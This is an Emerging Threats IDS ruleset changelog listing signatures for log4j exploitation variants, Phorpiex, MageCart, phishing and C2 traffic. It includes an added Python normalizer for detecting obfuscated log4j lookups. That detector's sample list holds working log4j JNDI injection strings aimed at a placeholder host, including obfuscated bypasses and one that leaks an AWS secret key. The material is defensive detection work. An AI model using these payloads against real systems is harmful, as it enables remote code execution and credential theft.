[***] Summary: [***]
44 new OPEN, 46 new PRO (44 OPEN + 2 PRO-only). More log4j, Phorpiex and Phish.
Thanks @MBThreatIntel and @_CPResearch_
Please share issues, feedback, and requests at
https://feedback.emergingthreats.net/feedback
[+++] Added rules: [+++]
Open:
2034769 - ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via
LDAPv3 Response M2 (attack_response.rules)
2034770 - ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3
Bind Request (policy.rules)
2034771 - ET POLICY Successful Non-Anonymous LDAPv3 Bind Request
Outbound (policy.rules)
2034772 - ET POLICY JavaClass Returned Via Non-Anonymous Outbound
LDAPv3 Bind Request (policy.rules)
2034773 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034774 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034775 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034776 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034777 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034778 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034779 - ET TROJAN MageCart Skimmer Domain in DNS Lookup
(bootstrap2 .xyz) (trojan.rules)
2034780 - ET EXPLOIT Oracle Coherence Deserialization RCE
(CVE-2020-2555) (exploit.rules)
2034781 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP
Bypass M1 (Outbound) (CVE-2021-44228) (exploit.rules)
2034782 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP
Bypass M1 (Outbound) (CVE-2021-44228) (exploit.rules)
2034783 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(Outbound) (CVE-2021-44228) (info.rules)
2034784 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(Outbound) (CVE-2021-44228) (info.rules)
2034785 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
upper Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034786 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034787 - ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound)
(CVE-2021-44228) (exploit.rules)
2034788 - ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound)
(CVE-2021-44228) (exploit.rules)
2034789 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034790 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034791 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034792 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034793 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034794 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034795 - ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034796 - ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034797 - ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034798 - ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034799 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP
Bypass M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034800 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP
Bypass M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034801 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
upper Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034802 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
lower Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034803 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
lower Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034804 - ET EXPLOIT Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed (Outbound) (CVE-2021-44228) (exploit.rules)
2034805 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034806 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed (Outbound) (CVE-2021-44228) (exploit.rules)
2034807 - ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key
Disclosure (Outbound) (CVE-2021-44228) (exploit.rules)
2034808 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(lower TCP Bypass) (CVE-2021-44228) (info.rules)
2034809 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(lower UDP Bypass) (CVE-2021-44228) (info.rules)
2034810 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(upper TCP Bypass) (CVE-2021-44228) (info.rules)
2034811 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(upper UDP Bypass) (CVE-2021-44228) (info.rules)
2034812 - ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound (policy.rules)
Pro:
2850706 - ETPRO CURRENT_EVENTS Successful Generic Phish 2021-12-20
(current_events.rules)
2850707 - ETPRO CURRENT_EVENTS Successful Generic Phish 2021-12-20
(current_events.rules)
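The log4j additions above are split by transport (tcp/udp), by JNDI scheme (ldap, iiop, corba, nds, nis) and by bypass method (lower/upper, nested lower/upper, the 2021/12/17 obfuscation), because a packet-level signature has to match each variant literally. The following Python is an added illustration of how those variants relate, not code from Emerging Threats or from the ruleset: it resolves the ${lower:...}/${upper:...} lookups inside out (nested ones included), then classifies the surviving ${jndi:...} lookup by scheme and flags a nested ${env:...} lookup of the kind the AWS Access Key Disclosure rule is named for. Assumptions beyond the page: the ${x:-default} form (e.g. ${::-j}) is handled as a further bypass, ldaps/rmi/dns are added to the scheme list as standard JNDI providers, the set of leaking lookups (env, sys, java, ctx, main, bundle) is my own choice, and all sample request fragments are constructed, using TEST-NET-3 addresses, not captured traffic. The normalizer is deliberately simplified relative to log4j's real StrSubstitutor; it only evaluates the lookups an attacker uses to rewrite the string.

```python
"""Normalise log4j-style ${...} lookup obfuscation and classify the result.

Added illustration, not part of the Emerging Threats changelog or ruleset.
Covers the bypass families named in the rule titles above (lower/upper,
nested lower/upper, ldap/iiop/corba/nds/nis schemes, lookups that leak
environment variables). The ${...:-default} form is an assumption beyond
the page's list. Sample inputs below are constructed, not captured.
"""
import re

# JNDI URL schemes. ldap/iiop/corba/nds/nis appear in the rule titles above;
# ldaps, rmi and dns are added here as an assumption (standard JNDI providers).
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "nis"}

# An innermost ${...} lookup: one whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The jndi lookup prefix followed by the URL scheme.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")
# Lookups that read process/JVM state; nested inside a JNDI URL they
# exfiltrate it (assumed list, cf. the AWS Access Key Disclosure rule above).
_LEAK = re.compile(r"\$\{(env|sys|java|ctx|main|bundle)[:}]")


def _resolve(body):
    """Evaluate one innermost lookup body, or return None if it must stay.

    Only lookups an attacker uses to rewrite the string itself are evaluated;
    jndi/env/... are left in place so the classifier can still see them.
    """
    if ":-" in body:                       # ${x:-default}, e.g. ${::-j} -> j
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        kind = kind.lower()
        if kind == "lower":
            return arg.lower()
        if kind == "upper":
            return arg.upper()
    return None


def normalize(text, max_rounds=32):
    """Collapse innermost lower/upper/default lookups, inside out, to a fixed point."""
    for _ in range(max_rounds):            # bound the work on adversarial input
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)          # keep jndi/env/date/... untouched
            changed = True
            return out

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def analyze(text):
    """Return a verdict dict for a JNDI lookup in `text`, or None if there is none."""
    norm = normalize(text).lower()         # log4j matches the lookup prefix case-insensitively
    m = _JNDI.search(norm)
    if not m:
        return None
    scheme = m.group(1)
    return {
        "scheme": scheme,
        "known_scheme": scheme in JNDI_SCHEMES,
        "obfuscated": norm != text.lower(),   # normalisation changed something
        "leaks_env": bool(_LEAK.search(norm)),
        "normalized": norm,
    }


# Constructed request fragments (not from any capture); 203.0.113.0/24 is TEST-NET-3.
SAMPLES = [
    "User-Agent: ${jndi:ldap://203.0.113.5:1389/a}",
    "${${lower:j}${upper:n}di:${lower:iiop}://203.0.113.5:1389/a}",
    "${${lower:${lower:j}}ndi:nds://203.0.113.5:1389/a}",
    "${${::-j}ndi:${::-r}mi://203.0.113.5:1099/a}",
    "${jndi:ldap://203.0.113.5:1389/${env:AWS_SECRET_ACCESS_KEY}}",
    "Mozilla/5.0 (benign) ${date:yyyy}",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s) or "no JNDI lookup", "<-", s)
```

Running it shows why the rule list needs one entry per scheme and bypass: the second, third and fourth samples all normalize to a plain ${jndi:<scheme>://...} string, but on the wire they share almost no bytes with it. A normalizing pre-processor of this kind belongs at the application or WAF layer, where the full string is available; an IDS matching raw packets still needs the per-variant signatures listed above, and the "(tcp)"/"(udp)" pairs exist because the same payload can arrive over either transport.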
[///] Modified active rules: [///]
2032936 - ET TROJAN Suspected Sliver DNS CnC (trojan.rules)
2034704 - ET POLICY Anonymous LDAPv3 Bind Request Outbound (policy.rules)
2034705 - ET POLICY Successful Anonymous LDAPv3 Bind Request
Outbound (policy.rules)
2034722 - ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via
LDAPv3 Response (attack_response.rules)
2808312 - ETPRO TROJAN Win32/Meac.A CnC (OUTBOUND) (trojan.rules)
2811176 - ETPRO TROJAN Luminosity Link RAT CnC Beacon Outbound (trojan.rules)
2835635 - ETPRO TROJAN Possible Kimsuky Phishing or Malware DNS
Lookup (trojan.rules)
2848776 - ETPRO TROJAN Sliver Framework HTTP C2 sessionInit (trojan.rules)
2850579 - ETPRO TROJAN Emotet CnC Beacon (trojan.rules)